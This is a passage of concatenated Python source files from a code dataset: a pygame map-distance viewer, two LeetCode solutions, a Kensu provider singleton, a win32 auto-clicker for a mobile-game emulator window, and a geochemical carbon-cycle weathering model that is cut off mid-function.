mock_cfg_classes.assert_called_once()\n","sub_path":"tests/unit/mpa/cls/semisl/test_cls_semisl_stage.py","file_name":"test_cls_semisl_stage.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"464795047","text":"import pygame as pg\nimport prepare\n\nfrom labels import Label\nfrom line import Line\nfrom state_engine import GameState\n\n\nclass MapViewer(GameState):\n \"\"\"\n This state allows the user to view the map they selected from\n the menu.\n \"\"\"\n def __init__(self):\n super(MapViewer, self).__init__()\n self.screen_rect = prepare.SCREEN.get_rect()\n\n def startup(self, persistent):\n self.persist = persistent\n self.map_name = self.persist[\"map name\"]\n self.map = prepare.GFX[self.map_name.replace(\" \", \"-\")]\n self.rect = self.map.get_rect(center=self.screen_rect.center)\n self.map_scale = prepare.SCALES[self.map_name]\n\n self.lines = []\n self.is_path_end = False\n\n self.font = prepare.FONTS[\"Saniretro\"]\n self.distance_label = None\n self.text_color = (255, 255, 255)\n self.bg_color = (0, 0, 0)\n info = \"Left click to add a point, Right click to end path\"\n self.info_labe = Label(self.font, 20, info,\n self.text_color,\n {\"bottomleft\": self.screen_rect.bottomleft},\n self.bg_color)\n\n def get_event(self, event):\n if event.type == pg.QUIT:\n self.quit = True\n\n if event.type == pg.MOUSEBUTTONUP:\n if event.button == 1: # left click\n if self.lines and self.lines[-1].moving:\n self.set_anchor_point(event.pos)\n else:\n if self.is_path_end:\n self.create_new_path()\n self.create_new_line(event.pos)\n\n if event.button == 3: # right click\n self.end_path(event.pos)\n\n if event.type == pg.MOUSEMOTION:\n if self.lines and self.lines[-1].moving:\n self.lines[-1].end = event.pos\n\n def update(self, dt):\n if self.lines:\n for line in self.lines:\n line.update()\n\n def draw(self, surface):\n surface.fill(pg.Color(\"gray2\"))\n surface.blit(self.map, self.rect)\n if self.lines:\n for line in self.lines:\n line.draw(surface)\n self.distance_label.draw(surface)\n self.info_labe.draw(surface)\n\n def create_new_line(self, pos):\n line = Line(pos)\n self.lines.append(line)\n text = \"{:.2f} miles - {:.2f} kms\".format(0.0, 0.0)\n self.distance_label = Label(self.font, 20, text,\n self.text_color, {\"topleft\": (0, 0)},\n self.bg_color)\n\n def set_anchor_point(self, pos):\n self.lines[-1].set_end(pos)\n self.distance_label.set_text(self.distance)\n line = Line(pos)\n self.lines.append(line)\n\n def create_new_path(self):\n self.lines = []\n\n def end_path(self, pos):\n self.lines[-1].set_end(pos)\n self.is_path_end = True\n\n @property\n def distance(self):\n distance = 0\n for line in self.lines:\n distance += line.distance * self.map_scale\n kms = distance * 1.60934 # simple conversion\n text = \"{:.2f} miles - {:.2f} kms\".format(distance, kms)\n return text\n","sub_path":"map_viewer.py","file_name":"map_viewer.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"121041902","text":"#\n# @lc app=leetcode.cn id=1380 lang=python3\n#\n# [1380] 矩阵中的幸运数\n#\n\n# @lc code=start\nclass Solution:\n def luckyNumbers(self, matrix: List[List[int]]) -> List[int]:\n # minRow = [min(row) for row in matrix]\n # maxCol = [max(col) for col in zip(*matrix)]\n # ans = []\n # for i, row in enumerate(matrix):\n # for j, x in enumerate(row):\n # if x == minRow[i] == maxCol[j]:\n # ans.append(x)\n # return ans\n ans = []\n for row in matrix:\n for j, x in enumerate(row):\n if max(r[j] for r in matrix) <= x <= min(row):\n ans.append(x)\n return ans\n\n\n# @lc code=end\n\n","sub_path":"1380.矩阵中的幸运数.py","file_name":"1380.矩阵中的幸运数.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243845730","text":"import logging\n\nfrom kensu.utils.helpers import singleton\n\n\n@singleton\nclass KensuProvider(object):\n default = None # type: Kensu\n\n def instance(self):\n # type: () -> Kensu\n return self.default\n\n def setKensu(self, kensu):\n self.default = kensu\n\n @staticmethod\n def initKensu(api_url=None, auth_token=None, process_name=None, user_name=None, code_location=None, init_context=True, do_report=True, report_to_file=False, offline_file_name=None, reporter=None, **kwargs):\n if KensuProvider().instance() is None:\n from kensu.utils.kensu import Kensu\n pandas_support = kwargs[\"pandas_support\"] if \"pandas_support\" in kwargs else True\n sklearn_support = kwargs[\"sklearn_support\"] if \"sklearn_support\" in kwargs else True\n bigquery_support = kwargs[\"bigquery_support\"] if \"bigquery_support\" in kwargs else False\n tensorflow_support = kwargs[\"tensorflow_support\"] if \"tensorflow_support\" in kwargs else False\n\n project_names = kwargs[\"project_names\"] if \"project_names\" in kwargs else []\n environment = kwargs[\"environment\"] if \"environment\" in kwargs else None\n timestamp = kwargs[\"timestamp\"] if \"timestamp\" in kwargs else None\n logical_naming = kwargs[\"logical_naming\"] if \"logical_naming\" in kwargs else None\n mapping = kwargs[\"mapping\"] if \"mapping\" in kwargs else True\n report_in_mem = kwargs[\"report_in_mem\"] if \"report_in_mem\" in kwargs else False\n\n _kensu = Kensu(api_url=api_url, auth_token=auth_token, process_name=process_name, user_name=user_name,\n code_location=code_location, init_context=init_context, do_report=do_report, pandas_support = pandas_support,\n sklearn_support = sklearn_support, bigquery_support = bigquery_support, tensorflow_support = tensorflow_support, \n project_names=project_names,environment=environment,timestamp=timestamp,logical_naming=logical_naming,mapping=mapping, report_in_mem = report_in_mem,\n report_to_file=report_to_file, offline_file_name=offline_file_name, reporter=reporter)\n\n KensuProvider().setKensu(_kensu)\n return _kensu\n else:\n logging.error(\"Kensu default is already set kensu={}\" % KensuProvider.instance())\n","sub_path":"kensu/utils/kensu_provider.py","file_name":"kensu_provider.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"451039759","text":"import win32api\nimport win32gui\nimport win32con\nimport time\n\n\nclass WangzherongyaoGame:\n\n def __init__(self):\n self.hwnd = win32gui.FindWindow(win32con.NULL, '腾讯手游助手【极速傲引擎】')\n self.left, self.top, self.right, self.bottom = win32gui.GetWindowRect(self.hwnd)\n self.sonHwnd = win32gui.FindWindowEx(self.hwnd, 0, \"AEngineRenderWindowClass\", None)\n self.sonLeft, self.sonTop, self.sonRight, self.sonBottom = win32gui.GetWindowRect(self.sonHwnd)\n self.offsetTop = self.sonTop - self.top\n self.offsetLeft = self.sonLeft - self.left\n self.width = self.sonRight - self.sonLeft\n self.height = self.sonBottom - self.sonTop\n\n def show(self):\n win32gui.ShowWindow(self.hwnd, win32con.SW_RESTORE)\n win32gui.SetForegroundWindow(self.hwnd)\n\n def getPixelColor(self, xy):\n color = win32gui.GetPixel(win32gui.GetWindowDC(self.hwnd), xy[0] + self.offsetLeft, xy[1] + self.offsetTop)\n return color % 256, color // 256 % 256, color // 256 // 256\n\n def click(self, xy):\n long_position = win32api.MAKELONG(xy[0], xy[1])\n print(win32api.SendMessage(self.hwnd, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, long_position))\n win32api.SendMessage(self.hwnd, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, long_position)\n\n\nif __name__ == '__main__':\n\n xys = [(100, 100),(200, 200),(300, 300),(400, 400),(805, 530), (805, 540), (805, 550), (805, 560), (805, 527), (805, 485), (774, 400), (1000, 87)]\n autoBtnXy = (957, 22)\n autoBtnColor = (175, 192, 201)\n\n game = WangzherongyaoGame()\n game.show()\n print(game.getPixelColor(autoBtnXy))\n\n while True:\n if game.getPixelColor(autoBtnXy) == autoBtnColor:\n print(456)\n game.click(autoBtnXy)\n for xy in xys:\n print(xy)\n game.click(xy)\n time.sleep(0.3)\n","sub_path":"wangzherongyao.py","file_name":"wangzherongyao.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595498524","text":"'''\nYou are given a binary string binary consisting of only 0's or 1's. You can apply each of the following operations any number of times:\n\nOperation 1: If the number contains the substring \"00\", you can replace it with \"10\".\nFor example, \"00010\" -> \"10010\"\nOperation 2: If the number contains the substring \"10\", you can replace it with \"01\".\nFor example, \"00010\" -> \"00001\"\nReturn the maximum binary string you can obtain after any number of operations. \nBinary string x is greater than binary string y if x's decimal representation is greater than y's decimal representation.\n'''\nclass Solution:\n\tdef maxString(self, binary:str)->str:\n\t\tif '0' not in binary:\n\t\t\treturn binary\n\t\tk, n = binary.count('1', binary.find('0')), len(binary)\n\t\treturn '1'*(n - k - 1) + '0' + '1'*k \nif __name__ == \"__main__\":\n\ts = \"000110\"\n\to = Solution()\n\tprint(o.maxString(s))\n\t\t\n\t\t\t","sub_path":"questions/1702. Maximum Binary String After Change/max.py","file_name":"max.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390835362","text":"###############################################################################\r\n# 7/9/18\r\n# \r\n# This file contains all of the functions necessary to simulate pCO2 in the \r\n# atmosphere of a planet with liquid water at the surface. The model is written\r\n# using the equations of \"Constraining the climate and ocean pH of the early\r\n# Earth with a geological carbon cycle model\" by Krissansen-Totten et al. \r\n# (2018). Unless otherwise noted, all equation references in this code refer \r\n# to the equations of that paper, which is abbreviated as JKT in this code.\r\n#\r\n# This code was written by Owen Lehmer, questions can be addressed to:\r\n# info@lehmer.us\r\n# \r\n# RUNNING THE MODEL\r\n# Steps: TBD\r\n###############################################################################\r\n\r\nfrom math import exp, log, log10\r\nfrom scipy.optimize import fsolve\r\nfrom pynamic import pynamic_ode\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nDEBUG = True #show some extra plots and prints during running when True\r\n\r\n\r\nclass ModelInputs:\r\n \"\"\"\r\n This class represents the structure for changing model parameters. The\r\n default parameters will be for the modern Earth. The values were taken from\r\n the mean values of the parameter ranges given in Table S1 and Table S2 of\r\n JKT. To change the parameters create a new ModelInputs object (see demo\r\n file) and pass it to runWeatheringModelPore().\r\n \"\"\"\r\n def __init__(self):\r\n self.Mo = 1.35E21 #ocean mass [kg]\r\n self.Mp = 1.35E19 #pore space mass [kg]\r\n self.W = 2.0E5 #ocean mixing time [yr]\r\n self.J = self.Mo/self.W #mixing rate of the ocean [kg yr-1]\r\n self.f_bio = 1.0 #biological weathering fraction \r\n self.f_land = 1.0 #land fraction compared to modern Earth\r\n self.oceanpH = 8.2 #pH of modern ocean\r\n self.Hmod_mol = 10.0**(-self.oceanpH) #equation S16, initial H conc.\r\n self.pCO2 = 0.000280 #pCO2 on modern Earth [bar]\r\n self.CO2_alpha = 0.3 #alpha term in equation 1\r\n self.CO2_eps = 0.3 #epsilon term in equation S2\r\n self.Te = 25.0 #e-folding temp in equations 1, S2 [K]\r\n self.Fmod_out = 6.0E12 #modern outgassing rate [mol C yr-1]\r\n self.Fmod_carb = 10.0E12 #modern carbonate weathering rate [mol C yr-1]\r\n self.carb_n = 1.75 #carbonate precipitation coefficient \r\n self.diss_x = 1.0 #modern seafloor dissolution relative to prec.\r\n self.grad = 1.075 #temperature gradient from surface to ocean depth\r\n self.gamma = 0.2 #pH dependence of seafloor weathering\r\n self.E_bas = 90000.0 #temp dependence of seafloor weathering [J mol-1]\r\n self.beta = 0.1 #spreading rate dependence\r\n self.out_m = 1.5 #outgassing exponent\r\n self.sed_depth = 700.0 #sediment thickness [m] \r\n self.Pmod_pore = 0.45E12 #modern pore space precipitation [mol C yr-1]\r\n self.Fmod_diss = 0.45E12 #modern seafloor dissolution rate [mol C yr-1]\r\n self.Ts_mod = 285.0 #modern (preindustrial) surface temp [K]\r\n self.ca = 0.01 #modern Ca abundance [mol kg-1]\r\n self.s = 1.8E20/self.Mo #correction factor for mass balance\r\n #the 1.8E20 is the mass of the atmosphere\r\n self.Q = 1.0 #internal heat flow compared to modern\r\n self.K = 77.8 #conductivity of the sediments [m K-1]\r\n self.lum = 1.0 #the luminosity compared to the modern Earth\r\n \r\n def setW(self,W):\r\n self.J = self.Mo/W\r\n self.W = W\r\n\r\n def print(self):\r\n for key, val in self.__dict__.items():\r\n print(\"%s = %2.3e\"%(key, val))\r\n\r\n\r\ndef runWeatheringModelPore(inputs=ModelInputs(), guess=None, chem_tol=1.0E-5, \r\n chem_max_iter=10, timestep=1000.0):\r\n \"\"\"\r\n This is the top level function to run the model. The model inputs can be\r\n changed by creating an instance of the ModelInputs() class then changing\r\n the values as desired, i.e.:\r\n my_inputs = ModelInputs()\r\n my_inputs.oceanpH = 7.0\r\n\r\n To run the model for the modern Earth simply call runWeatheringModelPore() with\r\n no parameters. \r\n\r\n The model can be run with a fast numerical solver (scipy.optimize.fsolve)\r\n or via manual integration (very slow). If the model is not converging try\r\n running the manual mode.\r\n\r\n Inputs:\r\n inputs - the model inputs parameters, default to the modern Earth\r\n guess - a guess for the alkalinity and carbon concentrations in\r\n the system. The guess must be an array of the form:\r\n [Co,Ao,Cp,Ap]\r\n chem_tol - the tolerance (% difference between runs) that will be \r\n used with the carbon chemistry\r\n chem_max_iter - the maximum number of iterations allowed during \r\n chemistry calculations\r\n timestep - the max timestep in [yr] to use in during integration\r\n\r\n Returns:\r\n [pCO2, pH, Ts] - array of values where the values are:\r\n pCO2 - the atmospheric CO2 partial pressure [bar]\r\n pH - the ocean pH\r\n Ts - the surface temperature [K]\r\n times - the time values that the model was run at\r\n y_vals - an array with the results of the model in the form:\r\n [Co, Ao, Cp, Ap] where Co is the ocean dissolved inorganic\r\n carbon concentration, Cp is the same but for the pore space,\r\n Ao is the alkalinity in the ocean, and Ap is the alkalinity of\r\n the pore space.\r\n status - the status of the model run, 1 means everything went well\r\n \"\"\"\r\n\r\n #calculate all the parameters needed\r\n F_out = globalOutgassing(inputs.Fmod_out, inputs.Q, inputs.out_m)\r\n\r\n #[K_diss, K_ocean, K_pore, Fmod_sil, alk0_o, alk0_p, Co0, Cp0, Ao0, Ap0] = \\\r\n [K_diss, K_ocean, K_pore, Fmod_sil, Co0, Cp0, Ao0, Ap0] = \\\r\n initialParameters(inputs)\r\n\r\n# K_diss = 3.066e43\r\n# K_ocean = 8.413e12\r\n# K_pore = 1.346e11\r\n# Co0 = 1.604e-3\r\n\r\n\r\n if guess is not None:\r\n #was given a guess\r\n [Co0, Cp0, Ao0, Ap0] = guess\r\n\r\n deltaTs = 0.0 #just initially\r\n\r\n #parameters we want to record, initialize them here\r\n pCO2 = inputs.pCO2\r\n pH = inputs.oceanpH\r\n Ts = 0.0 #just initialize the variable here\r\n\r\n def calculateModelDerivatives(_, params):\r\n \"\"\"\r\n The equation that will be passed to fsolve. Fsolve will take initial\r\n guesses for Co, Cp, Ao, and Ap, then iterate on each variable until\r\n it satisfies the equations in carbonAndAlkalinityEquations() (when all\r\n the derivatives are zero, which implies it's in steady state).\r\n \"\"\"\r\n \r\n #if you're not familiar with the nonlocal keyword, it is saying this \r\n #pCO2, pH, and Ts are the same as the ones declared outside this scope \r\n #(so above this func).\r\n nonlocal pCO2, pH, Ts\r\n\r\n [Co, Ao, Cp, Ap] = params\r\n\r\n #correct the ocean DIC for mass balance\r\n DIC = Co - inputs.s*pCO2\r\n \r\n Ts_old = 0.0\r\n num = 0\r\n diff = 1.0\r\n omega_o, omega_p = 0.0, 0.0\r\n T_pore = 0.0\r\n while diff > chem_tol and num < chem_max_iter:\r\n \"\"\"\r\n Solve for the equilibrium carbon chemistry. The solution is \r\n temperature dependent, so we'll iterate the process until the \r\n temperature and chemistry become steady (measured by the % change\r\n in Ts between runs).\r\n \"\"\"\r\n Ts = surfaceTempFromPureCO2ClimateModel(pCO2, inputs.lum) \r\n T_do = deepOceanTemperature(Ts, inputs.grad)\r\n T_pore = poreSpaceTemperature(T_do, inputs.Q, inputs.sed_depth, \r\n inputs.K)\r\n omega_o, pCO2, pH = equilibriumChemistry(Ts, Ao, DIC, inputs.s, \r\n Ao0, inputs.ca)\r\n omega_p = equilibriumChemistry(T_pore, Ap, Cp, 0, \r\n Ap0, inputs.ca)[0]\r\n diff = np.abs(Ts-Ts_old)/Ts #(pCO2 - pCO2_old)/pCO2\r\n num += 1\r\n Ts_old = Ts #pCO2_old = pCO2\r\n\r\n #calculate the terms needed\r\n P_ocean = 0\r\n P_pore = 0\r\n #only precipitate when omega > 1\r\n if omega_o > 1:\r\n P_ocean = K_ocean*inputs.f_land*(omega_o - 1.0)**inputs.carb_n #S19\r\n if omega_p > 1:\r\n P_pore = K_pore*(omega_p - 1.0)**inputs.carb_n #S19\r\n\r\n F_carb = continentalCarbonateWeathering(inputs.f_bio, inputs.f_land, \r\n inputs.Fmod_carb, pCO2, inputs.pCO2, inputs.CO2_eps, \r\n deltaTs, inputs.Te)\r\n\r\n F_sil = continentalSilicateWeahtering(inputs.f_bio, inputs.f_land, \r\n Fmod_sil, pCO2, inputs.pCO2, inputs.CO2_alpha, deltaTs, \r\n inputs.Te)\r\n\r\n H_mol = 10.0**(-pH) #equation S16, pH definition\r\n r_sr = spreadingRate(inputs.Q, inputs.beta)\r\n F_diss = seafloorBasaltDissolution(K_diss, r_sr, inputs.E_bas, \r\n T_pore, H_mol, inputs.Hmod_mol, inputs.gamma)\r\n\r\n #correct for mass balance in the ocean\r\n #print(\"Po=%2.3e, Pp=%2.3e, Fo=%2.3e, Fc=%2.3e, Fs=%2.3e, Fd=%2.3e\"%(P_ocean,P_pore, F_out, F_carb, F_sil, F_diss))\r\n\r\n derivatives = carbonAndAlkalinityEquations(\r\n inputs.Mo, inputs.Mp, inputs.J, Co, Cp, F_out, \r\n F_carb, P_ocean, Ao, Ap, \r\n F_sil, F_diss, P_pore)\r\n\r\n return derivatives #derivatives = [dtCo, dtAo, dtCp, dtAp]\r\n\r\n #prepare the model inputs\r\n start_time = 0\r\n max_time = 10E9 #we're using years, so 10 Byr max time to equilibrate\r\n initial_val = [Co0, Cp0, Ao0, Ap0]\r\n param_to_monitor = 0 #monitor carbon content in the ocean\r\n max_param_delta = 0.01 #1% change at most\r\n base_time_step = timestep #start at 1,000 years\r\n min_step_time = 0.1\r\n def end_condition(time, time_step, vals, vals_old):\r\n status = 0\r\n if time > 10E5:\r\n #make sure nothing weird happens with the initial conditions\r\n\r\n #check if the derivative is almost 0\r\n if abs((vals[0] - vals_old[0])/vals[0]) < 1.0E-6:\r\n #less than a 1.0E-6 relative change, \r\n #return a positive status value to end\r\n status = 1\r\n return status\r\n\r\n times, y_vals, status = pynamic_ode(calculateModelDerivatives, \r\n start_time, max_time, initial_val, param_to_monitor, \r\n max_param_delta, base_time_step, min_step_time, end_condition, \r\n use_rk4=True)\r\n\r\n if DEBUG:\r\n print(\"Solver had status: %d\"%(status))\r\n\r\n y_vals = np.array(y_vals)\r\n Co_arr = y_vals[:, 0]\r\n Cp_arr = y_vals[:, 1]\r\n Ao_arr = y_vals[:, 2]\r\n Ap_arr = y_vals[:, 3]\r\n\r\n plt.plot(times, Co_arr, label=\"Co\")\r\n plt.plot(times, Cp_arr, label=\"Cp\")\r\n plt.plot(times, Ao_arr, label=\"Ao\")\r\n plt.plot(times, Ap_arr, label=\"Ap\")\r\n plt.legend()\r\n plt.xlabel(\"Time [yr]\")\r\n plt.show()\r\n\r\n\r\n y_vals[-1][0] += inputs.s*pCO2 #correct for mass balance in Co for the last step\r\n \r\n #y_vals in an array of arrays with the form: [Co, Cp, Ao, Ap]\r\n return [pCO2, pH, Ts], times, y_vals, status\r\n\r\n\r\ndef initialParameters(inputs):\r\n \"\"\"\r\n Several parameters need to be initialized. Here we use the (assumed) values\r\n for modern seafloor carbonate precipitation, outgassing, and the ratio of\r\n seafloor dissolution to carbonate precipitation to calculate the rate \r\n constants needing by the model.\r\n \"\"\"\r\n Ts = 288 #surfaceTempFromPureCO2ClimateModel(inputs.pCO2, inputs.lum)\r\n T_do = deepOceanTemperature(Ts, inputs.grad)\r\n T_pore = poreSpaceTemperature(T_do, inputs.Q, inputs.sed_depth, inputs.K)\r\n\r\n [K1, K2, H_CO2] = equilibriumRateConstants(Ts)\r\n\r\n partition = inputs.Fmod_diss/inputs.Fmod_out\r\n Fmod_diss = partition*inputs.Fmod_out*inputs.diss_x\r\n Fmod_sil = (1.0 - partition)*inputs.Fmod_out + \\\r\n (1 - inputs.diss_x)*partition*inputs.Fmod_out\r\n Pmod_pore = partition*inputs.Fmod_out\r\n\r\n #initial conditions for atmosphere-ocean system (eqns S12 to S14)\r\n CO2aq_o = H_CO2*inputs.pCO2\r\n HCO3_o = K1*CO2aq_o/(10**-inputs.oceanpH)\r\n CO3_o = K2*HCO3_o/(10**-inputs.oceanpH)\r\n DIC_o = CO3_o + HCO3_o + CO2aq_o #total dissolved inorganic carbon\r\n ALK_o = 2.0*CO3_o + HCO3_o #carbonate alkalinity\r\n\r\n DIC_p = DIC_o - Pmod_pore/inputs.J\r\n b1 = 2.0*Fmod_diss + inputs.J*ALK_o - 2.0*inputs.J*DIC_o\r\n ALK_p = (b1 + 2.0*inputs.J*DIC_p)/inputs.J\r\n\r\n Pmod_ocean = inputs.Fmod_out + inputs.Fmod_carb -(DIC_o - DIC_p)*inputs.J\r\n\r\n omega_p, _, pH_p = equilibriumChemistry(T_pore, ALK_p, DIC_p, 0, \r\n ALK_p, inputs.ca)\r\n\r\n omega_o = inputs.ca*CO3_o/carbonateSolubility(T_do)\r\n\r\n K_pore = Pmod_pore/(omega_p - 1.0)**inputs.carb_n #for pore precip.\r\n K_ocean = Pmod_ocean/(omega_o - 1.0)**inputs.carb_n #for ocean precip.\r\n\r\n K_diss = Fmod_diss/(2.88*10**-14*10**(-inputs.gamma*pH_p)*\r\n exp(-inputs.E_bas/(8.314*T_pore)))\r\n\r\n Co = DIC_o + inputs.pCO2*inputs.s\r\n Cp = DIC_p\r\n Ao = ALK_o\r\n Ap = ALK_p\r\n\r\n return [K_diss, K_ocean, K_pore, Fmod_sil, Co, Cp, Ao, Ap]\r\n\r\n\r\ndef carbonAndAlkalinityEquations(Mo, Mp, J, Co, Cp, F_out, F_carb, P_ocean,\r\n Ao, Ap, F_sil, F_diss, P_pore):\r\n \"\"\"\r\n This function calculates the concentrations of carbon in the ocean-\r\n atmosphere system as well as the pore space. It will also solve for the\r\n alkalinity of the ocean and the pore space. This functions corresponds to \r\n equation S1. This is the top-level function that represents the model \r\n described by Krissansen-Totten et al. (2018).\r\n\r\n Inputs:\r\n Mo - mass of the ocean [kg]\r\n Mp - mass of the pore space [kg]\r\n J - constant mixing flux [kg s-1]\r\n Co - carbon concentration in atmosphere-ocean [Tmol C kg-1]\r\n Cp - carbon concentration in the pore space [Tmol C kg-1]\r\n F_out - global outgassing flux [Tmol C yr-1]\r\n F_carb - continental carbonate weathering rate [Tmol C yr-1]\r\n P_ocean - precipitation flux of carbonates in the ocean [Tmol C yr-1]\r\n Ao - carbonate alkalinity of the atmosphere-ocean [Tmol eq kg-1]\r\n Ap - carbonate alkalinity of the pore space [Tmol eq kg-1]\r\n F_sil - continental silicate weathering flux [ Tmol C yr-1]\r\n F_diss - seafloor weathering from basalt dissolution [Tmol eq yr-1]\r\n P_pore - carbonate precipitation flux in the pore space [Tmol C yr-1]\r\n\r\n Returns:\r\n dCo_dt - change in atmosphere-ocean carbon concentration [Tmol C yr-1]\r\n dAo_dt - change in atmosphere-ocean alkalinity [Tmol eq yr-1]\r\n dCp_dt - change in pore space carbon concentration [Tmol C yr-1]\r\n dAp_dt - change in pore space alkalinity [Tmol eq yr-1]\r\n \"\"\"\r\n\r\n dCo_dt = (-J*(Co - Cp) + F_out + F_carb - P_ocean)/Mo\r\n dAo_dt = (-J*(Ao - Ap) + 2*(F_sil + F_carb - P_ocean))/Mo\r\n dCp_dt = (J*(Co - Cp) - P_pore)/Mp\r\n dAp_dt = (J*(Ao - Ap) +2*(F_diss - P_pore))/Mp\r\n\r\n return [dCo_dt, dAo_dt, dCp_dt, dAp_dt]\r\n\r\n\r\ndef deltaSurfaceTemperature(Ts, Tmod_s):\r\n \"\"\"\r\n Calculate the delta Ts term for equation 1 and S2.\r\n\r\n Inputs:\r\n Ts - the surface temperature [K]\r\n Tmod_s - the modern surface temperature of the Earth [K]\r\n\r\n Returns:\r\n deltaTs - the change in temperature [K]\r\n \"\"\"\r\n\r\n deltaTs = Ts - Tmod_s\r\n\r\n return deltaTs\r\n\r\n\r\ndef continentalCarbonateWeathering(f_bio, f_land, Fmod_carb, pCO2, pCO2mod,\r\n eps, deltaTs, Te):\r\n \"\"\"\r\n The rate of carbon liberated by continental weathering will be returned from \r\n this function. This is function S2 in JKT.\r\n\r\n Inputs:\r\n f_bio - biological enhancement of weathering, set to 1 for the \r\n modern Earth [dimensionless]\r\n f_land - land fraction compared to the modern Earth [dimensionless]\r\n Fmod_carb - Earth's modern carbonate weathering rate [Tmol yr-1]\r\n pCO2 - partial pressure of CO2 [Pa]\r\n pCO2mod - Earth's modern (preindustrial) CO2 partial pressure [Pa]\r\n eps - empirical constant [dimensionless]\r\n deltaTs - difference in global mean surface temperature [K]\r\n Te - defines temperature dependence of weathering [K]\r\n\r\n Returns:\r\n F_carb - the carbonate weathering rate [Tmol yr-1]\r\n \"\"\"\r\n\r\n F_carb = f_bio*f_land*Fmod_carb*(pCO2/pCO2mod)**eps*exp(deltaTs/Te)\r\n\r\n return F_carb\r\n\r\ndef continentalSilicateWeahtering(f_bio, f_land, Fmod_sil, pCO2, pCO2mod, \r\n alpha, deltaTs, Te):\r\n \"\"\"\r\n The rate of silicate weathering from continents. This function corresponds\r\n to equation 1 from JKT.\r\n\r\n Inputs:\r\n f_bio - biological enhancement of weathering, set to 1 for the \r\n modern Earth [dimensionless]\r\n f_land - land fraction compared to the modern Earth [dimensionless]\r\n Fmod_sil - Earth's modern silicate weathering rate [Tmol yr-1]\r\n pCO2 - partial pressure of CO2 [Pa]\r\n pCO2mod - Earth's modern (preindustrial) CO2 partial pressure [Pa]\r\n alpha - empirical constant [dimensionless]\r\n deltaTs - difference in global mean surface temperature [K]\r\n Te - defines temperature dependence of weathering [K]\r\n\r\n Returns:\r\n F_sil - the silicate weathering rate [Tmol yr-1]\r\n \"\"\"\r\n\r\n F_sil = f_bio*f_land*Fmod_sil*(pCO2/pCO2mod)**alpha*exp(deltaTs/Te)\r\n\r\n return F_sil\r\n\r\ndef seafloorBasaltDissolution(k_diss, r_sr, E_bas, T_pore, H_mol, Hmod_mol,\r\n gamma):\r\n \"\"\"\r\n This function will calculate the rate of basalt dissolution on the \r\n seafloor. This function represents equation S3 of JKT.\r\n\r\n Inputs:\r\n k_diss - proportionality constant chosen to match modern flux \r\n [dimensionless]\r\n r_sr - spreading rate compared to modern [dimensionless] \r\n E_bas - effective activation energy of dissolution [kJ mol-1]\r\n T_pore - temperature of the pore space [K]\r\n H_mol - hydrogen ion molality in the pore space [mol kg-1]\r\n Hmod_mol - the modern H ion molality in pre space [mol kg-1]\r\n gamma - empirical scaling parameter [dimensionless]\r\n\r\n Returns:\r\n F_diss - rate of seafloor basalt dissolution [Tmol eq yr-1]\r\n \"\"\"\r\n\r\n Rg = 8.314 #universal gas constant [J mol-1 K-1]\r\n #F_diss_ = k_diss*r_sr*exp(-E_bas/(Rg*T_pore))*(H_mol/Hmod_mol)**gamma\r\n #print(\"k_diss=%2.3e, r_sr=%2.3e\"%(k_diss,r_sr))\r\n F_diss = k_diss*r_sr*exp(-E_bas/(Rg*T_pore))*2.88*10**-14*\\\r\n 10**(-gamma*(-log10(H_mol)))\r\n\r\n return F_diss\r\n\r\ndef poreSpaceTemperature(T_D, Q, S_thick, K):\r\n \"\"\"\r\n This function will calculate the temperature of the pore space. This is \r\n based on equation S4.\r\n\r\n Inputs:\r\n T_D - deep ocean temperature [K]\r\n Q - pore space heat flow relative to modern Earth [dimensionless]\r\n S_thick - the thickness of the pore space [m]\r\n K - conductivity of the pore space sediments [m K-1]\r\n\r\n Returns:\r\n T_pore - the temperature of the pore space [K]\r\n \"\"\"\r\n\r\n T_pore = T_D + Q*S_thick/K\r\n\r\n return T_pore\r\n\r\ndef globalOutgassing(Fmod_out, Q, m):\r\n \"\"\"\r\n This function will calculate the outgassing flux (equation S9).\r\n\r\n Inputs:\r\n Fmod_out - the modern Earth's outgassing rate [Tmol C yr-1]\r\n Q - pore space heat flow relative to modern Earth [dimensionless]\r\n m - scaling parameter [dimensionless]\r\n\r\n Returns:\r\n F_out - the global outgassing flux [Tmol C yr-1]\r\n \"\"\"\r\n\r\n F_out = Fmod_out*Q**m\r\n \r\n return F_out\r\n\r\ndef spreadingRate(Q, beta):\r\n \"\"\"\r\n Calculates the spreading rate on the planet.\r\n\r\n Inputs:\r\n Q - pore space heat flow relative to modern Earth [dimensionless]\r\n beta - scaling parameter [dimensionless]\r\n\r\n Returns:\r\n r_sr - the spreading rate relative to the modern Earth [dimensionless]\r\n \"\"\"\r\n\r\n r_sr = Q**beta\r\n\r\n return r_sr\r\n\r\ndef equilibriumChemistry(T, alk, carb, s, alk_init, Ca_init):\r\n \"\"\"\r\n Calculate the carbonate equilibrium and alkalinity. This can be used for\r\n either the atmosphere-ocean or the pore space. This function represents \r\n equations S11-S18.\r\n\r\n Inputs:\r\n T - the temperature of the system [K]\r\n alk - the alkalinity of the system [Tmol eq]\r\n carb - the carbon abundance in the system [Tmol]\r\n s - correction factor for mass balance\r\n alk_init - initial alkalinity of the system [Tmol eq]\r\n Ca_init - initial calcium ion concentration in the system [Tmol]\r\n\r\n Returns:\r\n omega - the saturation state of the system\r\n pCO2 - the partial pressure of CO2 [bar]\r\n pH - pH of the system\r\n \"\"\"\r\n\r\n #get the rate constants and Henry's constant\r\n [K1, K2, H_CO2] = equilibriumRateConstants(T)\r\n \r\n #use equation S15 to first calculate the H+ ion concentration\r\n roots = np.roots([alk/(K1*K2)*(1.0+s/H_CO2),\r\n 